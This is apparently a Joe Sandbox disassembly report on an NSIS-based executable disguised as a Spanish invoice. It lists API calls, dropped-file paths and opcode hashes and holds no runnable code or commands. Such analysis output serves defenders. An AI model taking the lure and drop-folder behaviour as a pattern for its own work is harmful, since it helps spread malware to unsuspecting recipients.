                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                  • Snapshot File: hcaresult_0_2_400000_Factura Honorarios 2024-11-17.jbxd
                                                                                                                                  Similarity
                                                                                                                                  • API ID: Window$Item$MessageSend$Show$EnableLongMenu$CallbackClassDestroyDispatcherEnabledSystemTextUserlstrlen
                                                                                                                                  • String ID: 6B
                                                                                                                                  • API String ID: 3282139019-4127139157
                                                                                                                                  • Opcode ID: 5b048d91d045b384b87ea39b7222d66b7397b759a9202294a9cfb78e4cfd3030
                                                                                                                                  • Instruction ID: 82b316f52afb12e79a093577f28ca1d9a17c40f64bf266079eac87a4e965ab64
                                                                                                                                  • Opcode Fuzzy Hash: 5b048d91d045b384b87ea39b7222d66b7397b759a9202294a9cfb78e4cfd3030
                                                                                                                                  • Instruction Fuzzy Hash: 89C1C071600201ABDB316F61ED88E2B3A78FB95746F40063EF641B51F0CB395992DB2D

                                                                                                                                  APIs
                                                                                                                                    • Part of subcall function 0040665E: GetModuleHandleA.KERNEL32(?,00000020,?,004033CB,0000000A), ref: 00406670
                                                                                                                                    • Part of subcall function 0040665E: GetProcAddress.KERNEL32(00000000,?), ref: 0040668B
                                                                                                                                  • lstrcatW.KERNEL32(1033,004236E8,80000001,Control Panel\Desktop\ResourceLocale,00000000,004236E8,00000000,00000002,C:\Users\user\AppData\Local\Temp\,75573420,"C:\Users\user\Desktop\Factura Honorarios 2024-11-17.exe",00000000), ref: 004039F5
                                                                                                                                  • lstrlenW.KERNEL32(Call,?,?,?,Call,00000000,C:\Users\user\AppData\Roaming\Microsoft\Windows\Templates\rigsfaellesskab,1033,004236E8,80000001,Control Panel\Desktop\ResourceLocale,00000000,004236E8,00000000,00000002,C:\Users\user\AppData\Local\Temp\), ref: 00403A75
                                                                                                                                  • lstrcmpiW.KERNEL32(?,.exe,Call,?,?,?,Call,00000000,C:\Users\user\AppData\Roaming\Microsoft\Windows\Templates\rigsfaellesskab,1033,004236E8,80000001,Control Panel\Desktop\ResourceLocale,00000000,004236E8,00000000), ref: 00403A88
                                                                                                                                  • GetFileAttributesW.KERNEL32(Call), ref: 00403A93
                                                                                                                                  • LoadImageW.USER32(00000067,00000001,00000000,00000000,00008040,C:\Users\user\AppData\Roaming\Microsoft\Windows\Templates\rigsfaellesskab), ref: 00403ADC
                                                                                                                                    • Part of subcall function 004061CB: wsprintfW.USER32 ref: 004061D8
                                                                                                                                  • RegisterClassW.USER32(004291A0), ref: 00403B19
                                                                                                                                  • SystemParametersInfoW.USER32(00000030,00000000,?,00000000), ref: 00403B31
                                                                                                                                  • CreateWindowExW.USER32(00000080,_Nb,00000000,80000000,?,?,?,?,00000000,00000000,00000000), ref: 00403B66
                                                                                                                                  • ShowWindow.USER32(00000005,00000000), ref: 00403B9C
                                                                                                                                  • GetClassInfoW.USER32(00000000,RichEdit20W,004291A0), ref: 00403BC8
                                                                                                                                  • GetClassInfoW.USER32(00000000,RichEdit,004291A0), ref: 00403BD5
                                                                                                                                  • RegisterClassW.USER32(004291A0), ref: 00403BDE
                                                                                                                                  • DialogBoxParamW.USER32(?,00000000,00403D22,00000000), ref: 00403BFD
                                                                                                                                  Strings
                                                                                                                                  Memory Dump Source
                                                                                                                                  • Source File: 00000000.00000002.1871642625.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                  • Snapshot File: hcaresult_0_2_400000_Factura Honorarios 2024-11-17.jbxd
                                                                                                                                  Similarity
                                                                                                                                  • API ID: Class$Info$RegisterWindow$AddressAttributesCreateDialogFileHandleImageLoadModuleParamParametersProcShowSystemlstrcatlstrcmpilstrlenwsprintf
                                                                                                                                  • String ID: "C:\Users\user\Desktop\Factura Honorarios 2024-11-17.exe"$.DEFAULT\Control Panel\International$.exe$1033$C:\Users\user\AppData\Local\Temp\$C:\Users\user\AppData\Roaming\Microsoft\Windows\Templates\rigsfaellesskab$Call$Control Panel\Desktop\ResourceLocale$RichEd20$RichEd32$RichEdit$RichEdit20W$_Nb$6B
                                                                                                                                  • API String ID: 1975747703-1169551628
                                                                                                                                  • Opcode ID: c728dd09fb0e724f558f784f5036d96df1f6ce9e2e9f1b64a51f93e144120454
                                                                                                                                  • Instruction ID: ac693f2390e271b0591ead3bca04d252cd9040af8bb9d400f005d771bc7483c2
                                                                                                                                  • Opcode Fuzzy Hash: c728dd09fb0e724f558f784f5036d96df1f6ce9e2e9f1b64a51f93e144120454
                                                                                                                                  • Instruction Fuzzy Hash: 0D61B770244600BFE630AF269D46F273A6CEB44B45F40057EF985B62E2DB7D5911CA2D

                                                                                                                                  APIs
                                                                                                                                  • GetTickCount.KERNEL32 ref: 00402EEE
                                                                                                                                  • GetModuleFileNameW.KERNEL32(00000000,C:\Users\user\Desktop\Factura Honorarios 2024-11-17.exe,00000400,?,00000006,00000008,0000000A), ref: 00402F0A
                                                                                                                                    • Part of subcall function 00405D7A: GetFileAttributesW.KERNELBASE(?,00402F1D,C:\Users\user\Desktop\Factura Honorarios 2024-11-17.exe,80000000,00000003,?,00000006,00000008,0000000A), ref: 00405D7E
                                                                                                                                    • Part of subcall function 00405D7A: CreateFileW.KERNELBASE(?,?,00000001,00000000,?,00000001,00000000,?,00000006,00000008,0000000A), ref: 00405DA0
                                                                                                                                  • GetFileSize.KERNEL32(00000000,00000000,00439000,00000000,C:\Users\user\Desktop,C:\Users\user\Desktop,C:\Users\user\Desktop\Factura Honorarios 2024-11-17.exe,C:\Users\user\Desktop\Factura Honorarios 2024-11-17.exe,80000000,00000003,?,00000006,00000008,0000000A), ref: 00402F56
                                                                                                                                  Strings
                                                                                                                                  Memory Dump Source
                                                                                                                                  • Source File: 00000000.00000002.1871642625.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                  • Snapshot File: hcaresult_0_2_400000_Factura Honorarios 2024-11-17.jbxd
                                                                                                                                  Similarity
                                                                                                                                  • API ID: File$AttributesCountCreateModuleNameSizeTick
                                                                                                                                  • String ID: "C:\Users\user\Desktop\Factura Honorarios 2024-11-17.exe"$C:\Users\user\AppData\Local\Temp\$C:\Users\user\Desktop$C:\Users\user\Desktop\Factura Honorarios 2024-11-17.exe$Error launching installer$Inst$Installer integrity check has failed. Common causes includeincomplete download and damaged media. Contact theinstaller's author $Null$soft
                                                                                                                                  • API String ID: 4283519449-3582667746
                                                                                                                                  • Opcode ID: 267abab7d79e74cef5e3127b9650355ecd25f4611b06b3885a53204473977592
                                                                                                                                  • Instruction ID: 8370a5f95b7ae461dcbe38738d17cc5e552d4c17a0c1bed0763bf9a4eadef116
                                                                                                                                  • Opcode Fuzzy Hash: 267abab7d79e74cef5e3127b9650355ecd25f4611b06b3885a53204473977592
                                                                                                                                  • Instruction Fuzzy Hash: FF51D171901204AFDB20AF65DD85B9E7FA8EB04319F14417BF904B72D5C7788E818BAD

                                                                                                                                  APIs
                                                                                                                                  • GetSystemDirectoryW.KERNEL32(Call,00000400), ref: 004063E7
                                                                                                                                  • GetWindowsDirectoryW.KERNEL32(Call,00000400,00000000,Skipped: C:\Users\user\AppData\Local\Temp\nsg8E1D.tmp\System.dll,?,00405323,Skipped: C:\Users\user\AppData\Local\Temp\nsg8E1D.tmp\System.dll,00000000), ref: 004063FA
                                                                                                                                  • SHGetSpecialFolderLocation.SHELL32(00405323,00410EA0,00000000,Skipped: C:\Users\user\AppData\Local\Temp\nsg8E1D.tmp\System.dll,?,00405323,Skipped: C:\Users\user\AppData\Local\Temp\nsg8E1D.tmp\System.dll,00000000), ref: 00406436
                                                                                                                                  • SHGetPathFromIDListW.SHELL32(00410EA0,Call), ref: 00406444
                                                                                                                                  • CoTaskMemFree.OLE32(00410EA0), ref: 0040644F
                                                                                                                                  • lstrcatW.KERNEL32(Call,\Microsoft\Internet Explorer\Quick Launch), ref: 00406475
                                                                                                                                  • lstrlenW.KERNEL32(Call,00000000,Skipped: C:\Users\user\AppData\Local\Temp\nsg8E1D.tmp\System.dll,?,00405323,Skipped: C:\Users\user\AppData\Local\Temp\nsg8E1D.tmp\System.dll,00000000), ref: 004064CD
                                                                                                                                  Strings
                                                                                                                                  Memory Dump Source
                                                                                                                                  • Source File: 00000000.00000002.1871642625.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                  • Snapshot File: hcaresult_0_2_400000_Factura Honorarios 2024-11-17.jbxd
                                                                                                                                  Similarity
                                                                                                                                  • API ID: Directory$FolderFreeFromListLocationPathSpecialSystemTaskWindowslstrcatlstrlen
                                                                                                                                  • String ID: Call$Skipped: C:\Users\user\AppData\Local\Temp\nsg8E1D.tmp\System.dll$Software\Microsoft\Windows\CurrentVersion$\Microsoft\Internet Explorer\Quick Launch
                                                                                                                                  • API String ID: 717251189-3216619722
                                                                                                                                  • Opcode ID: dd46a77467dc7c45da866f78f431b637c84e84ab5556cb2168e2007360d71072
                                                                                                                                  • Instruction ID: 605843c2509a57f6f3c23207e2b9262681d5cb504286618bc70e882f3b2b38d7
                                                                                                                                  • Opcode Fuzzy Hash: dd46a77467dc7c45da866f78f431b637c84e84ab5556cb2168e2007360d71072
                                                                                                                                  • Instruction Fuzzy Hash: 2C611171A00215ABDF209F64CC40AAE37A5AF54314F22813FE947BB2D0D77D5AA2CB5D

                                                                                                                                  APIs
                                                                                                                                  • lstrcatW.KERNEL32(00000000,00000000,Call,C:\Users\user\AppData\Roaming\Microsoft\Windows\Templates\rigsfaellesskab,?,?,00000031), ref: 004017B0
                                                                                                                                  • CompareFileTime.KERNEL32(-00000014,?,Call,Call,00000000,00000000,Call,C:\Users\user\AppData\Roaming\Microsoft\Windows\Templates\rigsfaellesskab,?,?,00000031), ref: 004017D5
                                                                                                                                    • Part of subcall function 00406284: lstrcpynW.KERNEL32(?,?,00000400,0040342A,00429200,NSIS Error,?,00000006,00000008,0000000A), ref: 00406291
                                                                                                                                    • Part of subcall function 004052EC: lstrlenW.KERNEL32(Skipped: C:\Users\user\AppData\Local\Temp\nsg8E1D.tmp\System.dll,00000000,00410EA0,004030B0,?,?,?,?,?,?,?,?,?,0040324F,00000000,?), ref: 00405324
                                                                                                                                    • Part of subcall function 004052EC: lstrlenW.KERNEL32(0040324F,Skipped: C:\Users\user\AppData\Local\Temp\nsg8E1D.tmp\System.dll,00000000,00410EA0,004030B0,?,?,?,?,?,?,?,?,?,0040324F,00000000), ref: 00405334
                                                                                                                                    • Part of subcall function 004052EC: lstrcatW.KERNEL32(Skipped: C:\Users\user\AppData\Local\Temp\nsg8E1D.tmp\System.dll,0040324F,0040324F,Skipped: C:\Users\user\AppData\Local\Temp\nsg8E1D.tmp\System.dll,00000000,00410EA0,004030B0), ref: 00405347
                                                                                                                                    • Part of subcall function 004052EC: SetWindowTextW.USER32(Skipped: C:\Users\user\AppData\Local\Temp\nsg8E1D.tmp\System.dll,Skipped: C:\Users\user\AppData\Local\Temp\nsg8E1D.tmp\System.dll), ref: 00405359
                                                                                                                                    • Part of subcall function 004052EC: SendMessageW.USER32(?,00001004,00000000,00000000), ref: 0040537F
                                                                                                                                    • Part of subcall function 004052EC: SendMessageW.USER32(?,0000104D,00000000,00000001), ref: 00405399
                                                                                                                                    • Part of subcall function 004052EC: SendMessageW.USER32(?,00001013,?,00000000), ref: 004053A7
                                                                                                                                  Strings
                                                                                                                                  Memory Dump Source
                                                                                                                                  • Source File: 00000000.00000002.1871642625.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                  • Associated: 00000000.00000002.1871626525.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                  • Associated: 00000000.00000002.1871665427.0000000000408000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                  • Associated: 00000000.00000002.1871685325.000000000040A000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                                  • Associated: 00000000.00000002.1871685325.0000000000422000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                                  • Associated: 00000000.00000002.1871685325.0000000000427000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                                  • Associated: 00000000.00000002.1871685325.000000000042B000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                                  • Associated: 00000000.00000002.1871685325.000000000042D000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                                  • Associated: 00000000.00000002.1871685325.0000000000430000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                                  • Associated: 00000000.00000002.1871685325.0000000000435000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                                  • Associated: 00000000.00000002.1871685325.000000000044A000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                                  • Associated: 00000000.00000002.1871819266.000000000044D000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                  • Snapshot File: hcaresult_0_2_400000_Factura Honorarios 2024-11-17.jbxd
                                                                                                                                  Similarity
                                                                                                                                  • API ID: MessageSend$lstrcatlstrlen$CompareFileTextTimeWindowlstrcpyn
                                                                                                                                  • String ID: C:\Users\user\AppData\Local\Temp\nsg8E1D.tmp$C:\Users\user\AppData\Local\Temp\nsg8E1D.tmp\System.dll$C:\Users\user\AppData\Roaming\Microsoft\Windows\Templates\rigsfaellesskab$Call
                                                                                                                                  • API String ID: 1941528284-1523810592
                                                                                                                                  • Opcode ID: b281b56859217cd12faca26e4537830f2bf9983139c1f988b18464fa74c6c1d9
                                                                                                                                  • Instruction ID: 128eea75dfaaf3eda36781b62dd3037428c7b97943fe82b2985fb16c69cf4114
                                                                                                                                  • Opcode Fuzzy Hash: b281b56859217cd12faca26e4537830f2bf9983139c1f988b18464fa74c6c1d9
                                                                                                                                  • Instruction Fuzzy Hash: C541A031900519BFCF10BBA5CD46EAE3679EF45328B20427FF412B10E1CA3C8A519A6E

                                                                                                                                  APIs
                                                                                                                                  • lstrlenW.KERNEL32(Skipped: C:\Users\user\AppData\Local\Temp\nsg8E1D.tmp\System.dll,00000000,00410EA0,004030B0,?,?,?,?,?,?,?,?,?,0040324F,00000000,?), ref: 00405324
                                                                                                                                  • lstrlenW.KERNEL32(0040324F,Skipped: C:\Users\user\AppData\Local\Temp\nsg8E1D.tmp\System.dll,00000000,00410EA0,004030B0,?,?,?,?,?,?,?,?,?,0040324F,00000000), ref: 00405334
                                                                                                                                  • lstrcatW.KERNEL32(Skipped: C:\Users\user\AppData\Local\Temp\nsg8E1D.tmp\System.dll,0040324F,0040324F,Skipped: C:\Users\user\AppData\Local\Temp\nsg8E1D.tmp\System.dll,00000000,00410EA0,004030B0), ref: 00405347
                                                                                                                                  • SetWindowTextW.USER32(Skipped: C:\Users\user\AppData\Local\Temp\nsg8E1D.tmp\System.dll,Skipped: C:\Users\user\AppData\Local\Temp\nsg8E1D.tmp\System.dll), ref: 00405359
                                                                                                                                  • SendMessageW.USER32(?,00001004,00000000,00000000), ref: 0040537F
                                                                                                                                  • SendMessageW.USER32(?,0000104D,00000000,00000001), ref: 00405399
                                                                                                                                  • SendMessageW.USER32(?,00001013,?,00000000), ref: 004053A7
                                                                                                                                  Strings
                                                                                                                                  Memory Dump Source
                                                                                                                                  • Source File: 00000000.00000002.1871642625.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                  • Snapshot File: hcaresult_0_2_400000_Factura Honorarios 2024-11-17.jbxd
                                                                                                                                  Similarity
                                                                                                                                  • API ID: MessageSend$lstrlen$TextWindowlstrcat
                                                                                                                                  • String ID: Skipped: C:\Users\user\AppData\Local\Temp\nsg8E1D.tmp\System.dll
                                                                                                                                  • API String ID: 2531174081-1121547751
                                                                                                                                  • Opcode ID: f62b684c0e6f289dd6bb465d0f12a75b041ce70bd46b314235ddfc122f96f8a0
                                                                                                                                  • Instruction ID: 5cbdc996bc9841dedcc8c590482a37e7ed43af3164ff52369f5afd8429117419
                                                                                                                                  • Opcode Fuzzy Hash: f62b684c0e6f289dd6bb465d0f12a75b041ce70bd46b314235ddfc122f96f8a0
                                                                                                                                  • Instruction Fuzzy Hash: FA219D71900618BBDB11AF96DD849CFBF78EF45354F50807AF904B62A0C3B94A50CFA8

                                                                                                                                  APIs
                                                                                                                                  • GetSystemDirectoryW.KERNEL32(?,00000104), ref: 00406605
                                                                                                                                  • wsprintfW.USER32 ref: 00406640
                                                                                                                                  • LoadLibraryExW.KERNEL32(?,00000000,00000008), ref: 00406654
                                                                                                                                  Strings
                                                                                                                                  Memory Dump Source
                                                                                                                                  • Source File: 00000000.00000002.1871642625.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                  • Snapshot File: hcaresult_0_2_400000_Factura Honorarios 2024-11-17.jbxd
                                                                                                                                  Similarity
                                                                                                                                  • API ID: DirectoryLibraryLoadSystemwsprintf
                                                                                                                                  • String ID: %s%S.dll$UXTHEME$\
                                                                                                                                  • API String ID: 2200240437-1946221925
                                                                                                                                  • Opcode ID: fcd04411c5a1f64f7e9219edfc5ac0d332aa1f587fd7b062781a7321f30925af
                                                                                                                                  • Instruction ID: 0a3accc906e0554885a7c349f3439cc1632e9825758041c21a8046ddc9b1cf8d
                                                                                                                                  • Opcode Fuzzy Hash: fcd04411c5a1f64f7e9219edfc5ac0d332aa1f587fd7b062781a7321f30925af
                                                                                                                                  • Instruction Fuzzy Hash: 28F0217050111967CB10EB64DD0DFAB3B6CA700304F10487AA547F10D1EBBDDB64CB98

                                                                                                                                  APIs
                                                                                                                                  Strings
                                                                                                                                  Memory Dump Source
                                                                                                                                  • Source File: 00000000.00000002.1871642625.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                  • Snapshot File: hcaresult_0_2_400000_Factura Honorarios 2024-11-17.jbxd
                                                                                                                                  Similarity
                                                                                                                                  • API ID: CountTick$wsprintf
                                                                                                                                  • String ID: ... %d%%
                                                                                                                                  • API String ID: 551687249-2449383134
                                                                                                                                  • Opcode ID: 557a710098fc5fea4fad4b99a5744db3c4a6bc79f6805394010e30fec0e2fa40
                                                                                                                                  • Instruction ID: eb9965c025c0ad248c1811abffb3300191da1be904cace2ded6344ef59bce26d
                                                                                                                                  • Opcode Fuzzy Hash: 557a710098fc5fea4fad4b99a5744db3c4a6bc79f6805394010e30fec0e2fa40
                                                                                                                                  • Instruction Fuzzy Hash: 97516B71900219EBCB10DF65EA44A9F3BA8AF44766F1441BFFC04B72C1C7789E518BA9

                                                                                                                                  APIs
                                                                                                                                  • CreateDirectoryW.KERNELBASE(?,?,00000000), ref: 004057FE
                                                                                                                                  • GetLastError.KERNEL32 ref: 00405812
                                                                                                                                  • SetFileSecurityW.ADVAPI32(?,80000007,00000001), ref: 00405827
                                                                                                                                  • GetLastError.KERNEL32 ref: 00405831
                                                                                                                                  Strings
                                                                                                                                  Memory Dump Source
                                                                                                                                  • Source File: 00000000.00000002.1871642625.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                  • Snapshot File: hcaresult_0_2_400000_Factura Honorarios 2024-11-17.jbxd
                                                                                                                                  Similarity
                                                                                                                                  • API ID: ErrorLast$CreateDirectoryFileSecurity
                                                                                                                                  • String ID: C:\Users\user\Desktop
                                                                                                                                  • API String ID: 3449924974-1876063424

                                                                                                                                  APIs
                                                                                                                                  • GetTickCount.KERNEL32 ref: 00405DC7
                                                                                                                                  • GetTempFileNameW.KERNELBASE(?,?,00000000,?,?,?,"C:\Users\user\Desktop\Factura Honorarios 2024-11-17.exe",00403357,1033,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,75573420,004035A3), ref: 00405DE2
                                                                                                                                  Strings
                                                                                                                                  Memory Dump Source
                                                                                                                                  • Source File: 00000000.00000002.1871642625.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                  • Snapshot File: hcaresult_0_2_400000_Factura Honorarios 2024-11-17.jbxd
                                                                                                                                  Similarity
                                                                                                                                  • API ID: CountFileNameTempTick
                                                                                                                                  • String ID: "C:\Users\user\Desktop\Factura Honorarios 2024-11-17.exe"$C:\Users\user\AppData\Local\Temp\$nsa
                                                                                                                                  • API String ID: 1716503409-2339286198

                                                                                                                                  APIs
                                                                                                                                    • Part of subcall function 6FF41B63: GlobalFree.KERNEL32(?), ref: 6FF41DB6
                                                                                                                                    • Part of subcall function 6FF41B63: GlobalFree.KERNEL32(?), ref: 6FF41DBB
                                                                                                                                    • Part of subcall function 6FF41B63: GlobalFree.KERNEL32(?), ref: 6FF41DC0
                                                                                                                                  • GlobalFree.KERNEL32(00000000), ref: 6FF41829
                                                                                                                                  • FreeLibrary.KERNEL32(?), ref: 6FF418AF
                                                                                                                                  • GlobalFree.KERNEL32(00000000), ref: 6FF418D4
                                                                                                                                    • Part of subcall function 6FF42356: GlobalAlloc.KERNEL32(00000040,?), ref: 6FF42387
                                                                                                                                    • Part of subcall function 6FF42728: GlobalAlloc.KERNEL32(00000040,00000000,?,?,00000000,?,?,?,6FF417FA,00000000), ref: 6FF427F8
                                                                                                                                    • Part of subcall function 6FF415C6: lstrcpyW.KERNEL32(?,6FF44020,00000000,6FF415C3,?,00000000,6FF41753,00000000), ref: 6FF415DC
                                                                                                                                  Strings
                                                                                                                                  Memory Dump Source
                                                                                                                                  • Source File: 00000000.00000002.1913284405.000000006FF41000.00000020.00000001.01000000.00000004.sdmp, Offset: 6FF40000, based on PE: true
                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                  • Snapshot File: hcaresult_0_2_6ff40000_Factura Honorarios 2024-11-17.jbxd
                                                                                                                                  Similarity
                                                                                                                                  • API ID: Global$Free$Alloc$Librarylstrcpy
                                                                                                                                  • String ID:
                                                                                                                                  • API String ID: 1791698881-3916222277
                                                                                                                                  APIs
                                                                                                                                    • Part of subcall function 00405C04: CharNextW.USER32(?,?,00425EF0,?,00405C78,00425EF0,00425EF0,?,?,75573420,004059B6,?,C:\Users\user\AppData\Local\Temp\,75573420,00000000), ref: 00405C12
                                                                                                                                    • Part of subcall function 00405C04: CharNextW.USER32(00000000), ref: 00405C17
                                                                                                                                    • Part of subcall function 00405C04: CharNextW.USER32(00000000), ref: 00405C2F
                                                                                                                                  • GetFileAttributesW.KERNELBASE(?,?,00000000,0000005C,00000000,000000F0), ref: 0040161A
                                                                                                                                    • Part of subcall function 004057BB: CreateDirectoryW.KERNELBASE(?,?,00000000), ref: 004057FE
                                                                                                                                  • SetCurrentDirectoryW.KERNELBASE(?,C:\Users\user\AppData\Roaming\Microsoft\Windows\Templates\rigsfaellesskab,?,00000000,000000F0), ref: 0040164D
                                                                                                                                  Strings
                                                                                                                                  • C:\Users\user\AppData\Roaming\Microsoft\Windows\Templates\rigsfaellesskab, xrefs: 00401640
                                                                                                                                  Memory Dump Source
                                                                                                                                  • Source File: 00000000.00000002.1871642625.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                  • Snapshot File: hcaresult_0_2_400000_Factura Honorarios 2024-11-17.jbxd
                                                                                                                                  Similarity
                                                                                                                                  • API ID: CharNext$Directory$AttributesCreateCurrentFile
                                                                                                                                  • String ID: C:\Users\user\AppData\Roaming\Microsoft\Windows\Templates\rigsfaellesskab
                                                                                                                                  • API String ID: 1892508949-4138664628
                                                                                                                                  Memory Dump Source
                                                                                                                                  • Source File: 00000000.00000002.1871642625.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                  • Snapshot File: hcaresult_0_2_400000_Factura Honorarios 2024-11-17.jbxd
                                                                                                                                  Memory Dump Source
                                                                                                                                  • Source File: 00000000.00000002.1871642625.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                  • Snapshot File: hcaresult_0_2_400000_Factura Honorarios 2024-11-17.jbxd
                                                                                                                                  Similarity
                                                                                                                                  • API ID:
                                                                                                                                  • String ID:
                                                                                                                                  • API String ID:
                                                                                                                                  • Opcode ID: a97e96a70b1528884494d5a2455c9c9c8bf64013d0c9d0d58a0b179d1d34f865
                                                                                                                                  • Instruction ID: 90999bc76b255a60827136b2fd47affe8781ac3d45706895e3c6f95813f0c94e
                                                                                                                                  • Opcode Fuzzy Hash: a97e96a70b1528884494d5a2455c9c9c8bf64013d0c9d0d58a0b179d1d34f865
                                                                                                                                  • Instruction Fuzzy Hash: 21913F71D04229CBDB28CF98C8547ADBBB1FF44305F14816ED456BB291C378AA86DF45
                                                                                                                                  Memory Dump Source
                                                                                                                                  • Source File: 00000000.00000002.1871642625.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                  • Snapshot File: hcaresult_0_2_400000_Factura Honorarios 2024-11-17.jbxd
                                                                                                                                  Similarity
                                                                                                                                  • API ID:
                                                                                                                                  • String ID:
                                                                                                                                  • API String ID:
                                                                                                                                  • Opcode ID: 526acb6b229722c101271a282f82fa7e8491aea9f4c983caca1afef0c2905762
                                                                                                                                  • Instruction ID: 7ab5a6fdb7118453f5bc4abdeeb58a7f0a93ca16cb9ae78d5f3cb9c6a39904d0
                                                                                                                                  • Opcode Fuzzy Hash: 526acb6b229722c101271a282f82fa7e8491aea9f4c983caca1afef0c2905762
                                                                                                                                  • Instruction Fuzzy Hash: 8E814471E04229DBDF24CFA8C8447ADBBB1FF44301F24816AD456BB291C778AA86DF15
                                                                                                                                  Memory Dump Source
                                                                                                                                  • Source File: 00000000.00000002.1871642625.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                  • Snapshot File: hcaresult_0_2_400000_Factura Honorarios 2024-11-17.jbxd
                                                                                                                                  Similarity
                                                                                                                                  • API ID:
                                                                                                                                  • String ID:
                                                                                                                                  • API String ID:
                                                                                                                                  • Opcode ID: d01b1c5effafd64d8cfad2db312f22eb5162b5418c1bb992621b7de497566ec4
                                                                                                                                  • Instruction ID: 21cf7db9f51931c48f99e7e9547f5b24ff728e46d141457ef608e09f17fb8729
                                                                                                                                  • Opcode Fuzzy Hash: d01b1c5effafd64d8cfad2db312f22eb5162b5418c1bb992621b7de497566ec4
                                                                                                                                  • Instruction Fuzzy Hash: 4C815571D04229DBDB24CFA9D8447ADBBB0FB44301F2081AEE456BB281C7786A86DF55
                                                                                                                                  Memory Dump Source
                                                                                                                                  • Source File: 00000000.00000002.1871642625.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                  • Snapshot File: hcaresult_0_2_400000_Factura Honorarios 2024-11-17.jbxd
                                                                                                                                  Similarity
                                                                                                                                  • API ID:
                                                                                                                                  • String ID:
                                                                                                                                  • API String ID:
                                                                                                                                  • Opcode ID: 133937f1df7ceb29c30f38c33f45990f246052236d4704b56955204b6cd885fa
                                                                                                                                  • Instruction ID: dacb8e277fcbb3a33cac5efaa2c5173e23fd2fcd6bf81bdfe6f06a7534410a90
                                                                                                                                  • Opcode Fuzzy Hash: 133937f1df7ceb29c30f38c33f45990f246052236d4704b56955204b6cd885fa
                                                                                                                                  • Instruction Fuzzy Hash: 6C714371E04229CBDF24CF98C8447ADBBB1FF44305F14806AD446BB281C738AA86DF04
                                                                                                                                  Memory Dump Source
                                                                                                                                  • Source File: 00000000.00000002.1871642625.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                  • Snapshot File: hcaresult_0_2_400000_Factura Honorarios 2024-11-17.jbxd
                                                                                                                                  Similarity
                                                                                                                                  • API ID:
                                                                                                                                  • String ID:
                                                                                                                                  • API String ID:
                                                                                                                                  • Opcode ID: 0a10928d7685989459388dead70c60bd1e808e0421cae42356cd2ce25e8ee986
                                                                                                                                  • Instruction ID: 610106becc8cf73b6091924598cab7a4a25495cbbf2bb893dbe28c15679d0a85
                                                                                                                                  • Opcode Fuzzy Hash: 0a10928d7685989459388dead70c60bd1e808e0421cae42356cd2ce25e8ee986
                                                                                                                                  • Instruction Fuzzy Hash: 5C714271E04229CBDB28CF98C844BADBBB1FF44301F14816AD456BB291C738A986DF45
                                                                                                                                  Memory Dump Source
                                                                                                                                  • Source File: 00000000.00000002.1871642625.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                  • Snapshot File: hcaresult_0_2_400000_Factura Honorarios 2024-11-17.jbxd
                                                                                                                                  Similarity
                                                                                                                                  • API ID:
                                                                                                                                  • String ID:
                                                                                                                                  • API String ID:
                                                                                                                                  • Opcode ID: 11d0e2bf2ab0c12615b3c88e0718215a3c217c66979ab711a777e3af05fd446c
                                                                                                                                  • Instruction ID: 65b73de0ce6de3c7b1653dbcc26eb67f08ce95b734c4b9eb4028e98c7b5a0113
